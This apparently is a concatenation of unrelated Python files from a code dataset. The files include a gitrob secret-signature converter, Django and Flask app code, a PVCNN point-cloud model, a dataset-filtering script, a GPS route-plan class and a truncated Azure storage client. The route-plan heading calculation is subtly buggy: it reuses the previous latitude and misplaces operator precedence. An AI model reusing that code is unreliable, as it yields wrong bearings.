<reponame>unk1nd0n3/bitbucket-creds-checker # -*- coding: utf-8 -*- # __version__ = '0.2' import json def read_json_file(path): """ Func for store json formatted data to local file :param path: string :return: none """ try: return json.loads(open(path).read()) except IOError: print("File is missed. Please check") def write_to_file(filename, data): """ Func for store dictionary to local file :param filename: string :param data: dictionary :return: None """ json_outfile = open(filename, 'w') json_outfile.write(data) json_outfile.close() def main(): """ :return: """ signatures = read_json_file('gitrob-signatures.txt') converted = '' for signature in signatures: regex = signature['pattern'].replace('\\A', '').replace('\\z', '').replace('\.?', '.?') line = '"{0}": re.compile(\'{1}\'),\n'.format(signature['caption'], regex) converted += line # print converted write_to_file('converted_gitron.txt', converted) return converted if __name__ == '__main__': main()
StarcoderdataPython
3214718
<reponame>ericgroom/simplefrench from django.contrib import admin from .models import Tip # Register your models here. admin.site.register(Tip)
StarcoderdataPython
1672590
<reponame>biochimia/hc2000 import importlib def _resolve(resource): if isinstance(resource, basestring): return importlib.import_module(resource) return resource def register_for_resource(plugin, resource): resource = _resolve(resource) # TODO: There isn't really a need for plugin lists to live in the resource # namespace, they could be maintained in this module. if not hasattr(resource, 'plugins'): resource.plugins = [] resource.plugins.insert(0, plugin) def apply_for_resource(resource, data): resource = _resolve(resource) if not hasattr(resource, 'plugins'): return for plugin in resource.plugins: plugin = _resolve(plugin) if not hasattr(plugin, 'apply'): continue plugin.apply(data)
StarcoderdataPython
1616127
""" Details of all the experiments we run. We do not seek to tune these parameters too much. The parameters here work for baselines. """ def get_experiment(params): if params['env_name'] in ['HalfCheetah-v2','HalfCheetah-v1']: params['h_dim'] = 32 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1000 elif params['env_name'] in ['Walker2d-v2']: params['h_dim'] = 32 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1000 elif params['env_name'] == 'Swimmer-v2': params['h_dim'] = 16 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1000 elif params['env_name'] == 'BipedalWalker-v2': params['h_dim'] = 32 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1600 elif params['env_name'] == 'point-v0': params['h_dim'] = 16 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 50 return(params)
StarcoderdataPython
151720
<reponame>rohitit09/store_app<filename>storeapp/apps/store/models.py from django.db import models from apps.user.models import StoreUser # Create your models here. class Category(models.Model): name=models.CharField(max_length=255) def __str__(self): return self.name class Meta: verbose_name='Category' verbose_name_plural='Categories' class Products(models.Model): product_name=models.CharField(max_length=255) description=models.TextField() mrp=models.DecimalField(max_digits=20,decimal_places=2) sale_price=models.DecimalField(max_digits=20,decimal_places=2) category = models.ForeignKey(Category, on_delete=models.CASCADE) def __str__(self): return self.product_name class Meta: verbose_name='Product' verbose_name_plural='Products' class Store(models.Model): name=models.CharField(max_length=255) address=models.TextField() products = models.ManyToManyField(Products,blank=True) # store_link=models.CharField(max_length=400,primary_key=True,unique=True) def __str__(self): return self.name class Meta: verbose_name='Store' verbose_name_plural='Stores' def get_absolute_url(self): return f"/view_store/{self.id}/" class Customer(models.Model): user=models.OneToOneField(StoreUser,on_delete=models.CASCADE) address=models.TextField() store = models.ManyToManyField(Store,blank=True) def __str__(self): return self.user.phone_number class Meta: verbose_name='Customer' verbose_name_plural='Customers' class Orders(models.Model): choices=( ('PENDING','PENDING'), ('APPROVED','APPROVED'), ('CANCELED','CANCELED') ) status=models.CharField(choices=choices,default='PENDING',max_length=8) order_created=models.DateTimeField(auto_now_add=True) amount=models.DecimalField(max_digits=20,decimal_places=2) quatity=models.IntegerField() product = models.ForeignKey(Products, on_delete=models.CASCADE) store = models.ForeignKey(Store, on_delete=models.CASCADE) customer = models.ForeignKey(Customer, on_delete=models.CASCADE,blank=True,null=True) def __str__(self): return self.product.product_name class Meta: verbose_name='Order' verbose_name_plural='Orders'
StarcoderdataPython
1666562
<filename>pythonExercicios/ex005.py #Crie um programa que leia um número Real qualquer pelo teclado e mostre na tela a sua porção inteira. import math num = float(input('Digite um número: ')) print("A parte real do número {} é {}".format(num,math.trunc(num)))
StarcoderdataPython
4814935
#!/usr/bin/python #/**************************************************************************** # route_plan_class # Copyright (c) 2016, <NAME> <<EMAIL>> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL HENRIK EGEMOSE SCHMIDT BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #****************************************************************************/ from nmea_parser_class import NMEA_data_parser # Import NMEA parser from aqlogreader.AQLogReader import aqLogReader # Import AQLogReader, note that the loaction of the file is in a subfolder from math import pi, sin, cos, atan2 # Import math functionality import matplotlib.pyplot as plt import numpy as np class Route_Plan: #### Constructors ### def __init__(self): return def __init__(self,filename_nmea,filename_aq_log): # Load flight data from NMEA file using the NMEA parser self.data_nmea = NMEA_data_parser(filename_nmea) # Instantiate parser object self.data_nmea.parse() # Parse the data file self.data_aq = aqLogReader(filename_aq_log) # Instantiate object ### Methods ### def get_pos_4DOF_nmea(self): # The NMEA data file does not contain heading information as specified in the exercise, therefore calculate based on 2 points. combinedData = [] # Structured as (rowwise) [longtitude, latitude, altitude, heading] for i in range(len(self.data_nmea.longtitude)): if i >= 1: #convert nmea to deg; NMEA format dddmm.mmmm tmp_lon_1_ddd = self.data_nmea.longtitude[i-1][1:3] tmp_lon_1_mmmmmm = self.data_nmea.longtitude[i-1][3:] tmp_lon_1 = float(tmp_lon_1_ddd) + (float(tmp_lon_1_mmmmmm)/60) tmp_lon_2_ddd = self.data_nmea.longtitude[i][1:3] tmp_lon_2_mmmmmm = self.data_nmea.longtitude[i][3:] tmp_lon_2 = float(tmp_lon_2_ddd) + (float(tmp_lon_2_mmmmmm)/60) tmp_lat_1_ddd = self.data_nmea.latitude[i-1][1:3] tmp_lat_1_mmmmmm = self.data_nmea.latitude[i-1][3:] tmp_lat_1 = float(tmp_lat_1_ddd) + (float(tmp_lat_1_mmmmmm)/60) tmp_lat_2_ddd = self.data_nmea.latitude[i-1][1:3] tmp_lat_2_mmmmmm = self.data_nmea.latitude[i-1][3:] tmp_lat_2 = float(tmp_lat_2_ddd) + (float(tmp_lat_2_mmmmmm)/60) #convert to rad tmp_lon_rad1 = (pi/180)*tmp_lon_1 #lambda1 tmp_lon_rad2 = (pi/180)*tmp_lon_2 #lambda2 tmp_lat_rad1 = (pi/180)*tmp_lat_1 #phi1 tmp_lat_rad2 = (pi/180)*tmp_lat_2 #phi1 #calculate bearing/heading (initial in regards to the points) y = sin(tmp_lon_rad2-tmp_lon_rad1) * cos(tmp_lat_rad2) x = cos(tmp_lat_rad1)*sin(tmp_lat_rad2) - sin(tmp_lat_rad1)*cos(tmp_lat_rad2)*cos(tmp_lon_rad2-tmp_lon_rad1) brng = atan2(y, x) % 2*pi # initial bearing/heading combinedData.append([self.data_nmea.longtitude[i], self.data_nmea.latitude[i], self.data_nmea.altitude[i], brng]) else: combinedData.append([self.data_nmea.longtitude[i], self.data_nmea.latitude[i], self.data_nmea.altitude[i], 0]) # first time only point information so no bearing yet. return combinedData def get_nmea_data(self): return self.data_nmea def get_aq_data(self): return self.data_aq def print_aq_info(self): print self.data_aq.printChannelNames() return
StarcoderdataPython
37946
import os import json import pickle import collections import numpy as np from s2and.consts import CONFIG DATA_DIR = CONFIG["main_data_dir"] OUTPUT_DIR = os.path.join(DATA_DIR, "s2and_mini") if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR) # excluding MEDLINE because it has no clusters DATASETS = [ "aminer", "arnetminer", "inspire", "kisti", "pubmed", "qian", "zbmath", ] BIG_BLOCK_CUTOFF = 500 TOP_BLOCKS_TO_KEEP = 1000 # load all of the artifacts of each dataset clusters_all = [] signatures_all = [] X_all = [] keys_all = [] papers_all = [] for dataset in DATASETS: print() print(f"Loading data from {dataset}...") for file_name in os.listdir(os.path.join(DATA_DIR, dataset)): file_name = os.path.join(DATA_DIR, dataset, file_name) if "specter" in file_name: with open(file_name, "rb") as _pickle_file: X, keys = pickle.load(_pickle_file) X_all.append(X) keys_all.append(keys) elif "cluster" in file_name: with open(file_name) as _json_file: clusters = json.load(_json_file) new_clusters = {} for cluster_id, v in clusters.items(): new_cluster_id = f"{dataset}_{cluster_id}" new_v = { "cluster_id": new_cluster_id, "signature_ids": [f"{dataset}_{i}" for i in v["signature_ids"]], "model_version": v["model_version"], } new_clusters[new_cluster_id] = new_v clusters_all.append(new_clusters) elif "paper" in file_name: with open(file_name) as _json_file: papers = json.load(_json_file) papers_all.append(papers) elif "signature" in file_name: with open(file_name) as _json_file: signatures = json.load(_json_file) new_signatures = {} for signature_id, v in signatures.items(): new_signature_id = f"{dataset}_{signature_id}" new_v = { "author_id": v["author_id"], # maybe this needs to be prepended by dataset? "paper_id": v["paper_id"], "signature_id": new_signature_id, "author_info": v["author_info"], } new_signatures[new_signature_id] = new_v signatures_all.append(new_signatures) else: print(f"WARNING: Ignoring {file_name} in {dataset}") print("Finished loading data. Filtering...") # the goal is speed so we'll remove the largest blocks # also only keep top 1000 blocks max # aminer has 32k, inspire has 15k, and kisti has 7k blocks for dataset, s, c, p, X, k in zip(DATASETS, signatures_all, clusters_all, papers_all, X_all, keys_all): blocks = [] for v in s.values(): blocks.append(v["author_info"]["block"]) vc = collections.Counter(blocks) blocks_to_keep = set([k for k, v in sorted(vc.items()) if v <= BIG_BLOCK_CUTOFF][:TOP_BLOCKS_TO_KEEP]) s_filtered = {k: v for k, v in s.items() if v["author_info"]["block"] in blocks_to_keep} # filter the clusters too c_filtered = {k: v for k, v in c.items() if np.all([i in s_filtered for i in v["signature_ids"]])} # go back through the clusters and find the signatures we'll actually need # need to do this because sometimes the block name is just... corrupted # e.g. "g miller" for most signatures but "g mller" for one... signature_keys_to_keep = set() for v in c_filtered.values(): signature_keys_to_keep.update(v["signature_ids"]) s_filtered = {k: v for k, v in s.items() if k in signature_keys_to_keep} # we don't need all the papers anymore. just the ones in signatures # also the references of those paper_ids = set([v["paper_id"] for v in s_filtered.values()]) ref_paper_ids = set() for v in p.values(): if v["references"] is not None: ref_paper_ids.update(v["references"]) p_filtered = {k: v for k, v in p.items() if int(k) in paper_ids or int(k) in ref_paper_ids} # filter down the specters to those in papers only since we don't use specters for references keys_filtered_flag = np.array([i in paper_ids for i in k.astype(int)]) k_filtered = k[keys_filtered_flag] X_filtered = X[keys_filtered_flag, :] # save all of the data data_output_dir = os.path.join(DATA_DIR, "s2and_mini", dataset) if not os.path.exists(data_output_dir): os.mkdir(data_output_dir) with open(os.path.join(data_output_dir, f"{dataset}_clusters.json"), "w") as _json_file: json.dump(c_filtered, _json_file) with open(os.path.join(data_output_dir, f"{dataset}_signatures.json"), "w") as _json_file: json.dump(s_filtered, _json_file) with open(os.path.join(data_output_dir, f"{dataset}_papers.json"), "w") as _json_file: json.dump(p_filtered, _json_file) with open(os.path.join(data_output_dir, f"{dataset}_specter.pickle"), "wb") as _pickle_file: pickle.dump((X_filtered, k_filtered), _pickle_file)
StarcoderdataPython
3284651
import numpy as np import torch import torch.nn as nn import functools import open3d from torch.autograd import Function from .base_model import BaseModel from ...utils import MODEL from ..modules.losses import filter_valid_label from ...datasets.augment import SemsegAugmentation if open3d.core.cuda.device_count() > 0: from open3d.ml.torch.ops import trilinear_devoxelize_forward, trilinear_devoxelize_backward class TrilinearDevoxelization(Function): @staticmethod def forward(ctx, features, coords, resolution, is_training=True): """Forward pass for the Op. Args: ctx: torch Autograd context. coords: the coordinates of points, FloatTensor[B, 3, N] features: FloatTensor[B, C, R, R, R] resolution: int, the voxel resolution. is_training: bool, training mode. Returns: torch.FloatTensor: devoxelized features (B, C, N) """ B, C = features.shape[:2] features = features.contiguous() coords = coords.contiguous() outs, inds, wgts = trilinear_devoxelize_forward(resolution, is_training, coords, features) if is_training: ctx.save_for_backward(inds, wgts) ctx.r = resolution return outs @staticmethod def backward(ctx, grad_output): """Backward pass for the Op. Args: ctx: torch Autograd context grad_output: gradient of outputs, FloatTensor[B, C, N] Returns: torch.FloatTensor: gradient of inputs (B, C, R, R, R) """ inds, wgts = ctx.saved_tensors grad_inputs = trilinear_devoxelize_backward(grad_output.contiguous(), inds, wgts, ctx.r) return grad_inputs.view(grad_output.size(0), grad_output.size(1), ctx.r, ctx.r, ctx.r), None, None, None trilinear_devoxelize = TrilinearDevoxelization.apply class PVCNN(BaseModel): """Semantic Segmentation model. Based on Point Voxel Convolutions. https://arxiv.org/abs/1907.03739 Uses PointNet architecture with separate Point and Voxel processing. Attributes: name: Name of model. Default to "PVCNN". num_classes: Number of classes. num_points: Number of points to sample per pointcloud. extra_feature_channels: Number of extra features. Default to 6 (RGB + Coordinate norms). batcher: Batching method for dataloader. augment: dictionary for augmentation. """ blocks = ((64, 1, 32), (64, 2, 16), (128, 1, 16), (1024, 1, None)) def __init__(self, name='PVCNN', device="cuda", num_classes=13, num_points=40960, extra_feature_channels=6, width_multiplier=1, voxel_resolution_multiplier=1, batcher='DefaultBatcher', augment=None, **kwargs): super(PVCNN, self).__init__( name=name, device=device, num_classes=num_classes, num_points=num_points, extra_feature_channels=extra_feature_channels, width_multiplier=width_multiplier, voxel_resolution_multiplier=voxel_resolution_multiplier, batcher=batcher, augment=augment, **kwargs) cfg = self.cfg self.device = device self.augmenter = SemsegAugmentation(cfg.augment) self.in_channels = extra_feature_channels + 3 layers, channels_point, concat_channels_point = create_pointnet_components( blocks=self.blocks, in_channels=self.in_channels, with_se=False, width_multiplier=width_multiplier, voxel_resolution_multiplier=voxel_resolution_multiplier) self.point_features = nn.ModuleList(layers) layers, channels_cloud = create_mlp_components( in_channels=channels_point, out_channels=[256, 128], classifier=False, dim=1, width_multiplier=width_multiplier) self.cloud_features = nn.Sequential(*layers) layers, _ = create_mlp_components( in_channels=(concat_channels_point + channels_cloud), out_channels=[512, 0.3, 256, 0.3, num_classes], classifier=True, dim=2, width_multiplier=width_multiplier) self.classifier = nn.Sequential(*layers) def forward(self, inputs): """Forward pass for the model. Args: inputs: A dict object for inputs with following keys point (torch.float32): Input pointcloud (B, 3, N) feat (torch.float32): Input features (B, 9, N) Returns: torch.float32 : probability distribution (B, N, C). """ coords = inputs['point'].to(self.device) feat = inputs['feat'].to(self.device) out_features_list = [] for i in range(len(self.point_features)): feat, _ = self.point_features[i]((feat, coords)) out_features_list.append(feat) # feat: num_batches * 1024 * num_points -> num_batches * 1024 -> num_batches * 128 feat = self.cloud_features(feat.max(dim=-1, keepdim=False).values) out_features_list.append( feat.unsqueeze(-1).repeat([1, 1, coords.size(-1)])) out = self.classifier(torch.cat(out_features_list, dim=1)) return out.transpose(1, 2) def preprocess(self, data, attr): """Data preprocessing function. This function is called before training to preprocess the data from a dataset. It consists of subsampling and normalizing the pointcloud and creating new features. Args: data: A sample from the dataset. attr: The corresponding attributes. Returns: Returns the preprocessed data """ # If num_workers > 0, use new RNG with unique seed for each thread. # Else, use default RNG. if torch.utils.data.get_worker_info(): seedseq = np.random.SeedSequence( torch.utils.data.get_worker_info().seed + torch.utils.data.get_worker_info().id) rng = np.random.default_rng(seedseq.spawn(1)[0]) else: rng = self.rng points = np.array(data['point'], dtype=np.float32) if 'label' not in data or data['label'] is None: labels = np.zeros((points.shape[0],), dtype=np.int32) else: labels = np.array(data['label'], dtype=np.int32).reshape((-1,)) if 'feat' not in data or data['feat'] is None: feat = points.copy() else: feat = np.array(data['feat'], dtype=np.float32) if attr['split'] in ['training', 'train']: points, feat, labels = self.augmenter.augment( points, feat, labels, self.cfg.get('augment', None)) points -= np.min(points, 0) feat = feat / 255.0 # Normalize to [0, 1] max_points_x = np.max(points[:, 0]) max_points_y = np.max(points[:, 1]) max_points_z = np.max(points[:, 2]) x, y, z = np.split(points, (1, 2), axis=-1) norm_x = x / max_points_x norm_y = y / max_points_y norm_z = z / max_points_z feat = np.concatenate([x, y, z, feat, norm_x, norm_y, norm_z], axis=-1) choices = rng.choice(points.shape[0], self.cfg.num_points, replace=(points.shape[0] < self.cfg.num_points)) points = points[choices].transpose() feat = feat[choices].transpose() labels = labels[choices] data = {} data['point'] = points data['feat'] = feat data['label'] = labels return data def transform(self, data, attr): """Transform function for the point cloud and features. This function is called after preprocess method. It consists of converting numpy arrays to torch Tensors. Args: data: A sample from the dataset. attr: The corresponding attributes. Returns: Returns dictionary data with keys (point, feat, label). """ data['point'] = torch.from_numpy(data['point']) data['feat'] = torch.from_numpy(data['feat']) data['label'] = torch.from_numpy(data['label']) return data def update_probs(self, inputs, results, test_probs, test_labels): result = results.reshape(-1, self.cfg.num_classes) probs = torch.nn.functional.softmax(result, dim=-1).cpu().data.numpy() labels = np.argmax(probs, 1) self.trans_point_sampler(patchwise=False) return probs, labels def inference_begin(self, data): data = self.preprocess(data, {'split': 'test'}) data['batch_lengths'] = [data['point'].shape[0]] data = self.transform(data, {}) self.inference_input = data def inference_preprocess(self): return self.inference_input def inference_end(self, inputs, results): results = torch.reshape(results, (-1, self.cfg.num_classes)) m_softmax = torch.nn.Softmax(dim=-1) results = m_softmax(results) results = results.cpu().data.numpy() probs = np.reshape(results, [-1, self.cfg.num_classes]) pred_l = np.argmax(probs, 1) return {'predict_labels': pred_l, 'predict_scores': probs} def get_loss(self, sem_seg_loss, results, inputs, device): """Calculate the loss on output of the model. Attributes: sem_seg_loss: Object of type `SemSegLoss`. results: Output of the model. inputs: Input of the model. device: device(cpu or cuda). Returns: Returns loss, labels and scores. """ cfg = self.cfg labels = inputs['data']['label'].reshape(-1,) results = results.reshape(-1, results.shape[-1]) scores, labels = filter_valid_label(results, labels, cfg.num_classes, cfg.ignored_label_inds, device) loss = sem_seg_loss.weighted_CrossEntropyLoss(scores, labels) return loss, labels, scores def get_optimizer(self, cfg_pipeline): optimizer = torch.optim.Adam(self.parameters(), **cfg_pipeline.optimizer) scheduler = torch.optim.lr_scheduler.ExponentialLR( optimizer, cfg_pipeline.scheduler_gamma) return optimizer, scheduler MODEL._register_module(PVCNN, 'torch') class SE3d(nn.Module): """Extra Sequential Dense layers to be used to increase model complexity. """ def __init__(self, channel, reduction=8): """Constructor for SE3d module. Args: channel: Number of channels in the input layer. reduction: Factor of channels in second layer. """ super().__init__() self.fc = nn.Sequential( nn.Linear(channel, channel // reduction, bias=False), nn.ReLU(inplace=True), nn.Linear(channel // reduction, channel, bias=False), nn.Sigmoid()) def forward(self, inputs): """Forward call for SE3d Args: inputs: Input features. Returns: Transformed features. """ return inputs * self.fc(inputs.mean(-1).mean(-1).mean(-1)).view( inputs.shape[0], inputs.shape[1], 1, 1, 1) def _linear_bn_relu(in_channels, out_channels): """Layer combining Linear, BatchNorm and ReLU Block.""" return nn.Sequential(nn.Linear(in_channels, out_channels), nn.BatchNorm1d(out_channels), nn.ReLU(True)) def create_mlp_components(in_channels, out_channels, classifier=False, dim=2, width_multiplier=1): """Creates multiple layered components. For each output channel, it creates Dense layers with Dropout. Args: in_channels: Number of input channels. out_channels: Number of output channels. classifier: Whether the layer is classifier(appears at the end). dim: Dimension width_multiplier: factor by which neurons expands in intermediate layers. Returns: A List of layers. """ r = width_multiplier if dim == 1: block = _linear_bn_relu else: block = SharedMLP if not isinstance(out_channels, (list, tuple)): out_channels = [out_channels] if len(out_channels) == 0 or (len(out_channels) == 1 and out_channels[0] is None): return nn.Sequential(), in_channels, in_channels layers = [] for oc in out_channels[:-1]: if oc < 1: layers.append(nn.Dropout(oc)) else: oc = int(r * oc) layers.append(block(in_channels, oc)) in_channels = oc if dim == 1: if classifier: layers.append(nn.Linear(in_channels, out_channels[-1])) else: layers.append( _linear_bn_relu(in_channels, int(r * out_channels[-1]))) else: if classifier: layers.append(nn.Conv1d(in_channels, out_channels[-1], 1)) else: layers.append(SharedMLP(in_channels, int(r * out_channels[-1]))) return layers, out_channels[-1] if classifier else int(r * out_channels[-1]) def create_pointnet_components(blocks, in_channels, with_se=False, normalize=True, eps=1e-6, width_multiplier=1, voxel_resolution_multiplier=1): """Creates pointnet components. For each output channel, it comprises of PVConv or SharedMLP layers. Args: blocks: list of (out_channels, num_blocks, voxel_resolution). in_channels: Number of input channels. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization. width_multiplier: factor by which neurons expands in intermediate layers. voxel_resolution_multiplier: Factor by which voxel resolution expands. Returns: A List of layers, input_channels, and concat_channels """ r, vr = width_multiplier, voxel_resolution_multiplier layers, concat_channels = [], 0 for out_channels, num_blocks, voxel_resolution in blocks: out_channels = int(r * out_channels) if voxel_resolution is None: block = SharedMLP else: block = functools.partial(PVConv, kernel_size=3, resolution=int(vr * voxel_resolution), with_se=with_se, normalize=normalize, eps=eps) for _ in range(num_blocks): layers.append(block(in_channels, out_channels)) in_channels = out_channels concat_channels += out_channels return layers, in_channels, concat_channels class SharedMLP(nn.Module): """SharedMLP Module, comprising Conv2d, BatchNorm and ReLU blocks.""" def __init__(self, in_channels, out_channels, dim=1): """Constructor for SharedMLP Block. Args: in_channels: Number of input channels. out_channels: Number of output channels. dim: Input dimension """ super().__init__() if dim == 1: conv = nn.Conv1d bn = nn.BatchNorm1d elif dim == 2: conv = nn.Conv2d bn = nn.BatchNorm2d else: raise ValueError if not isinstance(out_channels, (list, tuple)): out_channels = [out_channels] layers = [] for oc in out_channels: layers.extend([ conv(in_channels, oc, 1), bn(oc), nn.ReLU(True), ]) in_channels = oc self.layers = nn.Sequential(*layers) def forward(self, inputs): """Forward pass for SharedMLP Args: inputs: features or a list of features. Returns: Transforms first features in a list. """ if isinstance(inputs, (list, tuple)): return (self.layers(inputs[0]), *inputs[1:]) else: return self.layers(inputs) class PVConv(nn.Module): """Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features. """ def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-6): """Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization. """ super().__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.resolution = resolution self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps) voxel_layers = [ nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=1e-4), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=1e-4), nn.LeakyReLU(0.1, True), ] if with_se: voxel_layers.append(SE3d(out_channels)) self.voxel_layers = nn.Sequential(*voxel_layers) self.point_features = SharedMLP(in_channels, out_channels) def forward(self, inputs): """Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features. """ features, coords = inputs voxel_features, voxel_coords = self.voxelization(features, coords) voxel_features = self.voxel_layers(voxel_features) voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training) fused_features = voxel_features + self.point_features(features) return fused_features, coords def avg_voxelize(feat, coords, r): """Voxelize points and returns a voxel_grid with mean of features lying in same voxel. Args: feat: Input features (B, 3, N). coords: Input coordinates (B, C, N). r (int): Resolution of voxel grid. Returns: voxel grid (B, C, r, r, r) """ coords = coords.to(torch.int64) batch_size = feat.shape[0] dim = feat.shape[1] grid = torch.zeros((batch_size, dim, r, r, r)).to(feat.device) batch_id = torch.from_numpy(np.arange(batch_size).reshape(-1, 1)).to( feat.device) hash = batch_id * r * r * r + coords[:, 0, :] * r * r + coords[:, 1, :] * r + coords[:, 2, :] hash = hash.reshape(-1,).to(feat.device) for i in range(0, dim): grid_ = torch.zeros(batch_size * r * r * r, device=feat.device).scatter_add_( 0, hash, feat[:, i, :].reshape(-1,)).reshape( batch_size, r, r, r) grid[:, i] = grid_ count = torch.zeros(batch_size * r * r * r, device=feat.device).scatter_add_( 0, hash, torch.ones_like(feat[:, 0, :].reshape( -1,))).reshape(batch_size, 1, r, r, r).clamp(min=1) count[count == 0] = 1 grid = grid / count return grid class Voxelization(nn.Module): """Voxelization module. Normalize the coordinates and returns voxel_grid with mean of features lying in same voxel. """ def __init__(self, resolution, normalize=True, eps=1e-6): """Constructor of Voxelization module. Args: resolution (int): Resolution of the voxel grid. normalize (bool): Whether to normalize coordinates. eps (float): Small epsilon to avoid nan. """ super().__init__() self.r = int(resolution) self.normalize = normalize self.eps = eps def forward(self, features, coords): """Forward pass for Voxelization. Args: features: Input features. coords: Input coordinates. Returns: Voxel grid of features (B, C, r, r, r) """ coords = coords.detach() norm_coords = coords - coords.mean(2, keepdim=True) if self.normalize: norm_coords = norm_coords / (norm_coords.norm( dim=1, keepdim=True).max(dim=2, keepdim=True).values * 2.0 + self.eps) + 0.5 else: norm_coords = (norm_coords + 1) / 2.0 norm_coords = torch.clamp(norm_coords * self.r, 0, self.r - 1) vox_coords = torch.round(norm_coords).to(torch.int32) return avg_voxelize(features, vox_coords, self.r), norm_coords def extra_repr(self): """Extra representation of module.""" return 'resolution={}{}'.format( self.r, ', normalized eps = {}'.format(self.eps) if self.normalize else '')
StarcoderdataPython
3225054
<gh_stars>1-10 from datetime import timedelta from webargs import fields from . import BaseView, use_args, use_kwargs from ..models.event import Event as EventModel from ..schemas.event import Event as EventSchema, EventMatch from .utils import get_or_404 eventlist_args = { "fromdate": fields.Date(required=False), "todate": fields.Date(required=False), } class EventListView(BaseView): # pylint: disable=no-self-use route_base = "/events" @use_kwargs(eventlist_args, location="query") def get(self, fromdate, todate): if fromdate and todate: matches = EventModel.get_between(fromdate, todate) return EventMatch.jsonify(matches), 200 objects = EventModel.query_all().all() return EventSchema.jsonify(objects), 200 @use_args(EventSchema(), location="json") def post(self, args): obj = EventModel.create(**args) return EventSchema.jsonify(obj), 201 class EventItemView(BaseView): # pylint: disable=no-self-use route_base = "/events/<int:id>" def get(self, id): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) return EventSchema.jsonify(obj), 200 @use_args(EventSchema(), location="json") def put(self, args, id): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) obj.update(**args) return EventSchema.jsonify(obj), 200 def delete(self, id): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) obj.delete() return "", 204 repeat_args = { "days": fields.Int(required=True), } class EventRepeatView(BaseView): # pylint: disable=no-self-use route_base = "/events/<int:id>/repeat" @use_kwargs(repeat_args, location="json") def post(self, id, days): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) if obj.repeat is not None: return "", 400 dt = obj.date + timedelta(days=days) new_obj = EventModel.create(name=obj.name, icon=obj.icon, date=dt) return EventSchema.jsonify(new_obj), 201
StarcoderdataPython
197042
# # Copyright (c) 2012-2020 Snowflake Computing Inc. All right reserved. # from __future__ import division import json import os from collections import namedtuple from logging import getLogger from .constants import HTTP_HEADER_VALUE_OCTET_STREAM, SHA256_DIGEST, FileHeader, ResultStatus from .encryption_util import EncryptionMetadata use_new_azure_api = False try: from azure.core.exceptions import ResourceNotFoundError, HttpResponseError from azure.storage.blob import BlobServiceClient, ContentSettings, ExponentialRetry use_new_azure_api = True except ImportError: import logging import requests from azure.common import AzureHttpError, AzureMissingResourceHttpError from azure.storage.blob import BlockBlobService from azure.storage.blob.models import ContentSettings from azure.storage.common._http.httpclient import HTTPResponse, _HTTPClient from azure.storage.common._serialization import _get_data_bytes_or_stream_only from azure.storage.common.retry import ExponentialRetry class RawBodyReadingClient(_HTTPClient): """Class that allows Azure to download files with content-encoding=gzip compressed. For more information see: https://github.com/Azure/azure-storage-python/issues/509. This client overrides the default HTTP client and downloads uncompressed. This workaround was provided by Microsoft. """ def perform_request(self, request): """Sends an HTTPRequest to Azure Storage and returns an HTTPResponse. If the response code indicates an error, raise an HTTPError. """ # Verify whether the body is in bytes or either a file-like/stream object if request.body: request.body = _get_data_bytes_or_stream_only('request.body', request.body) # Construct the URI uri = self.protocol.lower() + '://' + request.host + request.path # Send the request response = self.session.request(request.method, uri, params=request.query, headers=request.headers, data=request.body or None, timeout=self.timeout, proxies=self.proxies, stream=True) # Parse the response status = int(response.status_code) response_headers = {} for key, name in response.headers.items(): # Preserve the case of metadata if key.lower().startswith('x-ms-meta-'): response_headers[key] = name else: 